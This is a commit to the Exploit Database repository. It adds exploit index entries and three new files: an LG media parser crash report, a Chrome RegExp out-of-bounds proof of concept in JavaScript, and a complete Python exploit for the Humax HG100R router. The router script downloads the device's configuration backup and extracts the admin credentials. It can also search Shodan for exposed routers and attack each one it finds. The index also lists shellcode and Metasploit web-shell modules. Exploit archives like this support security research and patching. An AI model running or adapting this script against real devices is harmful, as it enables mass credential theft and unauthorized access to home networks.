DB: 2017-07-01

3 new exploits LG MRA58K - 'ASFParser::SetMetaData' Stack Overflow Google Chrome - Out-of-Bounds Access in RegExp Stubs ActiveMQ < 5.14.0 - web shell upload (Metasploit) ActiveMQ < 5.14.0 - Web Shell Upload (Metasploit) Humax HG100R 2.0.6 - Backup File Download
2017-07-01 05:01:21 +00:00 · 2017-07-01 05:01:21 +00:00 · da85974f2a
commit da85974f2a
parent 83c4965a4e
4 changed files with 142 additions and 1 deletions
--- a/files.csv
+++ b/files.csv
@ -5603,6 +5603,8 @@ id,file,description,date,author,platform,type,port
 42277,platforms/freebsd_x86/dos/42277.c,"FreeBSD - 'FGPU' Stack Clash (PoC)",2017-06-28,"Qualys Corporation",freebsd_x86,dos,0
 42278,platforms/freebsd_x86/dos/42278.c,"FreeBSD - 'FGPE' Stack Clash (PoC)",2017-06-28,"Qualys Corporation",freebsd_x86,dos,0
 42279,platforms/freebsd_x86/dos/42279.c,"FreeBSD - 'setrlimit' Stack Clash (PoC)",2017-06-28,"Qualys Corporation",freebsd_x86,dos,0
+42285,platforms/android/dos/42285.txt,"LG MRA58K - 'ASFParser::SetMetaData' Stack Overflow",2017-06-30,"Google Security Research",android,dos,0
+42286,platforms/multiple/dos/42286.txt,"Google Chrome - Out-of-Bounds Access in RegExp Stubs",2017-06-30,"Google Security Research",multiple,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -15676,7 +15678,7 @@ id,file,description,date,author,platform,type,port
 42251,platforms/python/remote/42251.rb,"Symantec Messaging Gateway 10.6.2-7 - Remote Code Execution (Metasploit)",2017-06-26,"Mehmet Ince",python,remote,443
 42257,platforms/cgi/remote/42257.rb,"Netgear DGN2200 - dnslookup.cgi Command Injection (Metasploit)",2017-06-26,Metasploit,cgi,remote,80
 42282,platforms/windows/remote/42282.rb,"Veritas/Symantec Backup Exec - SSL NDMP Connection Use-After-Free (Metasploit)",2017-06-29,Metasploit,windows,remote,10000
-42283,platforms/java/remote/42283.rb,"ActiveMQ < 5.14.0 - web shell upload (Metasploit)",2017-06-29,Metasploit,java,remote,0
+42283,platforms/java/remote/42283.rb,"ActiveMQ < 5.14.0 - Web Shell Upload (Metasploit)",2017-06-29,Metasploit,java,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -38101,3 +38103,4 @@ id,file,description,date,author,platform,type,port
 42263,platforms/php/webapps/42263.txt,"WordPress Plugin Ultimate Product Catalogue 4.2.2 - SQL Injection",2017-06-27,"Lenon Leite",php,webapps,0
 42268,platforms/windows/webapps/42268.py,"Easy File Sharing Web Server 7.2 - Unrestricted File Upload",2017-06-28,Chako,windows,webapps,0
 42269,platforms/linux/webapps/42269.txt,"Kaspersky Anti-Virus File Server 8.0.3.297 - Multiple Vulnerabilities",2017-06-28,"Core Security",linux,webapps,0
+42284,platforms/hardware/webapps/42284.py,"Humax HG100R 2.0.6 - Backup File Download",2017-06-30,gambler,hardware,webapps,0
--- a/platforms/android/dos/42285.txt
+++ b/platforms/android/dos/42285.txt
@ -0,0 +1,26 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1226
+
+There are three variants of the below crash, all of which stemming from an unbound copy into a fixed size stack buffer allocated in the function ASFParser::SetMetaData, used as an argument to each of the three calls to the function unicodeToUtf_8 without checking that the output length will be less than the size of the buffer. You can see in the crashdump that the argv array has been overwritten by junk unicode output, resulting in the corrupted binary path displayed in the output.
+
+I believe that this issue is mitigated by compiling with stack cookies, so I'm not applying the 90 day deadline to this issue since I don't think it's exploitable except as a denial-of-service.
+
+*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
+Build fingerprint: 'lge/p1_global_com/p1:6.0/MRA58K/1624210305d45:user/release-keys'
+Revision: '11'
+ABI: 'arm'
+pid: 435, tid: 435, name: mediaserver  >>> <20>ు둢吟ѷἃ舄㹂慮춎䇛㾾攞䎤➹뽉龂팆顯浃桡＞큾略혭拴畹㿺㬭똦৿➦쎪悸ꪰ뒇᭥릧㠙<EF859C><E3A099><EFBFBD>褓悀䳘牀⛕鑆ࡢ<E99186><E0A1A2><EFBFBD>㹇䊌⾩ʘỬ操陊ꦑ䤮峇ᇱ빌屸쒫羮죾‘궈砜톢庋_䔗蛴ᰦ꿚肁࿗砘搒깷옮豩烙켯펤傁䅥툺帰Ŧ䥎ᢘ퐢옥ꤤࠨ᪗@<40><><EFBFBD>Ԃ깛Ȯ댁ૃ⒨待讍ꄌ鈤䄚戬㸵Ṣ䙌䠖咂徕琣༔ৰ씊塀⏆ð厔⁀呕！谀櫰ុì⪌跔띦䳊薵結စ䌷﷌<EFB78C><EF88AD><EFBFBD>๑髇#쀇붭
+signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0xff951000
+    r0 ff951002  r1 f023b0ba  r2 0000100e  r3 ffffff8f
+AM write failed: Broken pipe
+    r4 00000792  r5 f023bfde  r6 f5f1c080  r7 efdfca69
+    r8 f1282348  r9 ff94fc70  sl f1282348  fp 00000012
+    ip 0000a3c6  sp ff94fc5c  lr efdf7457  pc efdf4a9a  cpsr 800f0030
+
+backtrace:
+    #00 pc 00003a9a  /system/lib/liblg_parser_asf.so (_Z14unicodeToUtf_8PhPti+85)
+    #01 pc 00006453  /system/lib/liblg_parser_asf.so (_ZN9ASFParser11SetMetaDataEP15meta_descriptor+186)
+    #02 pc 6b203432  <unknown>
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42285.zip
--- a/platforms/hardware/webapps/42284.py
+++ b/platforms/hardware/webapps/42284.py
@ -0,0 +1,90 @@
+# coding: utf-8
+
+# Exploit Title: Humax Backup file download
+# Date: 29/06/2017
+# Exploit Author: gambler
+# Vendor Homepage: http://humaxdigital.com
+# Version: VER 2.0.6
+# Tested on: OSX Linux
+# CVE : CVE-2017-7315
+
+import sys
+import base64
+import shodan
+import requests
+import subprocess
+
+def banner():
+    print '''
+ ██░ ██  █    ██  ███▄ ▄███▓ ▄▄▄      ▒██   ██▒
+▓██░ ██▒ ██  ▓██▒▓██▒▀█▀ ██▒▒████▄    ▒▒ █ █ ▒░
+▒██▀▀██░▓██  ▒██░▓██    ▓██░▒██  ▀█▄  ░░  █   ░
+░▓█ ░██ ▓▓█  ░██░▒██    ▒██ ░██▄▄▄▄██  ░ █ █ ▒
+░▓█▒░██▓▒▒█████▓ ▒██▒   ░██▒ ▓█   ▓██▒▒██▒ ▒██▒
+ ▒ ░░▒░▒░▒▓▒ ▒ ▒ ░ ▒░   ░  ░ ▒▒   ▓▒█░▒▒ ░ ░▓ ░
+ ▒ ░▒░ ░░░▒░ ░ ░ ░  ░      ░  ▒   ▒▒ ░░░   ░▒ ░
+ ░  ░░ ░ ░░░ ░ ░ ░      ░     ░   ▒    ░    ░
+ ░  ░  ░   ░            ░         ░  ░ ░    ░
+    '''
+    print 'Description: Humax HG100R backup file download'
+    print 'Software Version: VER 2.0.6'
+    print 'SDK Version: 5.7.1mp1'
+    print 'IPv6 Stack Version: 1.2.2'
+    print 'Author: Gambler'
+    print 'Vulnerability founded: 14/03/2016'
+    print 'CVE: waiting'
+    print
+
+def xplHelp():
+    print 'Exploit syntax error, Example:'
+    print 'python xpl.py http://192.168.0.1'
+
+def exploit(server):
+    path = '/view/basic/GatewaySettings.bin'
+    if not server.startswith('http'):
+        server = 'http://%s' % server
+    if server.endswith('/'):
+        server = server[:-1]+''
+    url = '%s/%s' %(server,path)
+    print '[+] - Downloading configuration file and decoding'
+    try:
+        r = requests.get(url, stream=True,timeout=10)
+        for chunk in r.iter_content(chunk_size=1024):
+            if chunk:
+                rawdata = r.content
+        save(rawdata)
+    except:
+        pass
+
+def save(rawdata):
+    config = base64.b64decode(rawdata).decode('ascii','ignore').replace('^@','')
+    open('config.txt', 'w').write(config)
+    print '[+] - Done, file saved as config.txt'
+    infos = subprocess.Popen(["strings config.txt | grep -A 1 admin"], shell=True,stdout=subprocess.PIPE).communicate()[0]
+    print '[+] - Credentials found'
+    print infos
+
+def shodanSearch():
+    SHODAN_API_KEY = "SHODAN_API_KEY"
+    api = shodan.Shodan(SHODAN_API_KEY)
+    try:
+            results = api.search('Copyright © 2014 HUMAX Co., Ltd. All rights reserved.')
+            print 'Results found: %s' % results['total']
+            for result in results['matches']:
+                    router = 'http://%s:%s' % (result['ip_str'],result['port'])
+                    print router
+                    exploit(router)
+    except shodan.APIError, e:
+            print 'Error: %s' % e
+
+
+if __name__ == '__main__':
+
+    if len(sys.argv) < 2:
+        xplHelp()
+        sys.exit()
+    banner()
+    if sys.argv[1] == 'shodan':
+        shodanSearch()
+    else:
+        exploit(sys.argv[1])
--- a/platforms/multiple/dos/42286.txt
+++ b/platforms/multiple/dos/42286.txt
@ -0,0 +1,22 @@
+There is an out-of-bounds access in RegExp.prototype.exec and RegExp.prototype.test. The code defined in BranchIfFastRegExp checks whether a regular expression object has the default map, however, it is possible to alter the map after this check has been performed. This can cause inline fields, such as lastIndex to be changed to dictionary properties. This will cause out-of-bounds reads and writes the next time lastIndex is accessed on the fast path.
+
+A minimal PoC is as follows, and two full PoCs (one for test and one for exec) are attached.
+
+var re;
+function f(){
+	for(var i = 0; i < 100; i++){
+		re["test" + i] = 0x77777777; // make a dict
+	}
+return 0;
+}
+
+re = /-/g;
+var str = '2016-01-02';
+re.lastIndex = {valueOf : f};
+result = re.exec(str);
+
+This PoC crashes on google-chrome-beta on Linux.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42286.zip